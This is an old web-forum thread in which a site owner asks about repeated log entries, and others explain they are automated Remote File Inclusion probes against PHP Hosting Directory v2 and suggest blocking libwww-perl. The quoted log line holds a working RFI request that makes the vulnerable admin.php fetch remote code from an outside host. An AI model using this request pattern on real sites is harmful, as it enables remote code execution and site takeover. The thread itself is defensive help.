phphost_directoryv2

Worker Joined: Oct 26, 2004 Posts: 134 Location: Boston

Can some one let me know what they are trying to do ? I am seeing a lot of this on my site

Quote:

85.12.15.28 - - [16/Aug/2008:15:22:05 -0600] "GET //phphost_directoryv2/include/admin.php?rd=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 500 823 "-" "libwww-perl/5.810"

Thanks for any info

Posted: Sat Aug 16, 2008 9:54 pm

Remote File Inclusion [ Only registered users can see links on this board! Get registered or login! ]

PHP Hosting Directory v2 [ Only registered users can see links on this board! Get registered or login! ]

Robots don't care you aren't using this software.. they just scan every site and if you happen to use it, bingo... easy hacked site

Posted: Tue Aug 19, 2008 5:55 pm

Thank you evaders99 for the info

I did ban the ips but now it is coming from others here in the USA what is the best way to stop this completely on the site

Site Admin Joined: Jun 04, 2004 Posts: 6432

Probably using spoofed IPs, so blocking won't help.

Posted: Tue Aug 19, 2008 7:03 pm

Or hacked servers by this botnet
You should use NukeSentinel or .htaccess rules to block libwww-perl

Posted: Sat Aug 23, 2008 8:12 pm

Thank you both for the help I should of did a search of the site on this problem as you have answered this problem many times in the past. As I get older I forget more. adding the block I now see just one in the logs instead of many

Stay safe and have a great day